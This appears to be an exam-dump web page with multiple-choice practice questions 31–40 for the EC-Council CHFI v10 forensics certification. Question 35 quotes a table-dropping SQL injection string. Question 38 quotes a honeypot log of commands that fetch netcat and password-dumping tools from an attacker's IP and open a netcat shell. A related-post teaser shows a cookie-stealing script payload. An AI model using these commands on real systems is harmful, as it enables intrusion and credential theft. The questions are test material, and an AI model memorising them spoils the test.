Enjoy 15% Discount With Coupon 15off

EC-Council 312-49v10 Computer Hacking Forensic Investigator (CHFI-v10) Online Training

EC-Council 312-49v10 Computer Hacking Forensic Investigator (CHFI-v10) Online Training

EC-Council 312-49v10 Online Training

The questions for 312-49v10 were last updated at Dec 26,2024.
  • Exam Code: 312-49v10
  • Exam Name: Computer Hacking Forensic Investigator (CHFI-v10)
  • Certification Provider: EC-Council
  • Latest update: Dec 26,2024
Question #31

When examining a file with a Hex Editor, what space does the file header occupy?

  • A . the last several bytes of the file
  • B . the first several bytes of the file
  • C . none, file headers are contained in the FAT
  • D . one byte at the beginning of the file

Reveal Solution Hide Solution

Question #32

While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?

  • A . Keep the information of file for later review
  • B . Destroy the evidence
  • C . Bring the information to the attention of the prosecutor, his or her supervisor or finally to the judge
  • D . Present the evidence to the defense attorney

Reveal Solution Hide Solution

Question #33

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document.

What is that code called?

  • A . Globally unique ID
  • B . Microsoft Virtual Machine Identifier
  • C . Personal Application Protocol
  • D . Individual ASCII string

Reveal Solution Hide Solution

Question #34

A(n) _____________________ is one that’s performed by a computer program rather than the attacker manually performing the steps in the attack sequence.

  • A . blackout attack
  • B . automated attack
  • C . distributed attack
  • D . central processing attack

Reveal Solution Hide Solution

Question #35

What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email = ‘[email protected]’; DROP TABLE members; –‘

  • A . Deletes the entire members table
  • B . Inserts the Error! Reference source not found.email address into the members table
  • C . Retrieves the password for the first user in the members table
  • D . This command will not produce anything since the syntax is incorrect

Reveal Solution Hide Solution

Question #36

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT.

Which firewall would be most appropriate for Harold? needs?

  • A . Circuit-level proxy firewall
  • B . Packet filtering firewall
  • C . Application-level proxy firewall
  • D . Data link layer firewall

Reveal Solution Hide Solution

Question #37

If an attacker’s computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

  • A . The zombie will not send a response
  • B . 31402
  • C . 31399
  • D . 31401

Reveal Solution Hide Solution

Question #38

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Short reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly.

The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

  • A . It is a local exploit where the attacker logs in using username johna2k
  • B . There are two attackers on the system – johna2k and haxedj00
  • C . The attack is a remote exploit and the hacker downloads three files
  • D . The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Reveal Solution Hide Solution

Question #39

If you plan to startup a suspect’s computer, you must modify the ___________ to ensure that you do not contaminate or alter data on the suspect’s hard drive by booting to the hard drive.

  • A . deltree command
  • B . CMOS
  • C . Boot.sys
  • D . Scandisk utility

Reveal Solution Hide Solution

Question #40

In General, __________________ Involves the investigation of data that can be retrieved from the hard disk or other disks of a computer by applying scientific methods to retrieve the data.

  • A . Network Forensics
  • B . Data Recovery
  • C . Disaster Recovery
  • D . Computer Forensics

Reveal Solution Hide Solution

Previous Questions Next Questions
Latest 312-49v10 Dumps Valid Version with 601 Q&As

Latest And Valid Q&A | Instant Download | Once Fail, Full Refund

Instant Download 312-49v10 PDF
Subscribe
Notify of
guest
0 Comments
Inline Feedbacks
View all comments

Related Posts

24Oct

EC-Council 312-50v10 Certified Ethical Hacker Exam (C|EH v10) Online Training

Question #1 As an Ethical Hacker you are capturing traffic from your customer network with Wireshark and you need to find... read more

16Oct

EC-Council 312-50v11 Certified Ethical Hacker Exam – C|EH v11 Online Training

Question #1 Alice, a professional hacker, targeted an organization's cloud services. She infiltrated the targets MSP provider by sending spear-phishing emails... read more

12Oct

EC-Council 512-50 EC-Council Information Security Manager (E|ISM) Online Training

Question #1 When choosing a risk mitigation method what is the MOST important factor? A . Approval from the board of directorsB... read more

03Oct

EC-Council 312-49v9 ECCouncil Computer Hacking Forensic Investigator (V9) Online Training

Question #1 What does mactime, an essential part of the coroner's toolkit do? A . It traverses the file system and produces... read more

28Oct

EC-Council ECSAv10 EC-Council Certified Security Analyst Online Training

Question #1 Irin is a newly joined penetration tester for XYZ Ltd. While joining, as a part of her training, she... read more

20Oct

EC-Council 212-81 EC-Council Certified Encryption Specialist (ECES) Online Training

Question #1 What size block does AES work on? A . 64B . 128C . 192D . 256 Reveal... read more

14Sep

EC-Council 112-51 Network Defense Essentials Exam (NDE) Online Training

Question #1 Amber is working as a team lead in an organization. She was instructed to share a policy document with... read more

15Oct

EC-Council CEH-001 Certified Ethical Hacker (CEH) Online Training

Question #1 Consider the following code: URL: http://www.certified.com/search.pl? text=<script>alert(document.cookie)</script> If an attacker can trick a victim user to click a link... read more

19Oct

EC-Council 412-79V10 EC-Council Certified Security Analyst (ECSA) V10 Online Training

Question #1 A WHERE clause in SQL specifies that a SQL Data Manipulation Language (DML) statement should only affect rows that... read more

11Oct

EC-Council 312-50v12 Certified Ethical Hacker Exam (CEHv12) Online Training

Question #1 Which of the following tools performs comprehensive tests against web servers, including dangerous files and CGIs? A . NiktoB .... read more